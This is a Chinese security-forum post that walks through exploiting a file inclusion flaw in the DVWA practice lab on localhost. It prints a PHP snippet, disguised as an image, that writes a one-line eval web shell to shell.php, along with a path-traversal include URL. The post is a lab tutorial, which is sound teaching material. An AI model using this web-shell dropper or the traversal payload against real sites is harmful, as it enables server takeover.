查看: 13873|回复: 0

文件包含

[复制链接]
  • TA的每日心情
    开心
    2020-12-22 10:07
  • 签到天数: 12 天

    [LV.3]偶尔看看II

    发表于 2019-10-17 20:41:03 | 显示全部楼层 |阅读模式
    本帖最后由 bailancheng 于 2019-10-17 20:41 编辑

    文件包含漏洞

    PHP解析漏洞:
    01.txt是一个正常的文本文件,但文件内容却是符合PHP语法的代码:
    在记事本中写入下面这段代码,保存成jpg文件。
    <?php
    phpinfo();
    ?>

    利用文件包含漏洞包含01.txt,其中的代码被正确执行了。
    将01.txt的扩展名改为jpg、rar、doc、xxx等,都可以执行。
    只要文件内容符合PHP语法规范,那么任何扩展名都可以被PHP解析
    接下来开始输入一句话木马:
    <?php
    fwrite(fopen("shell.php","w"),’<?php eval($_POST[123]); ?>’);
    ?>

    开始上传:
    首先将级别改为最高,然后开始上传

    点击上传后:

    在\AppServ\www\dvwa\vulnerabilities\fi目录中生成shell.php文件,文件内容正是一句话木马。
    接下来修改漏洞级别为low使用文件上传,通过文件包含漏洞执行jpg文件中的代码
    http://127.0.0.1/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/ma.jpg
    321.JPG
    测试shell.php:

    显示有这个目录

    显示有这个目录

    什么都不显示表示有这个目录,已经生成了
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-4 16:21 , Processed in 0.023660 second(s), 13 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部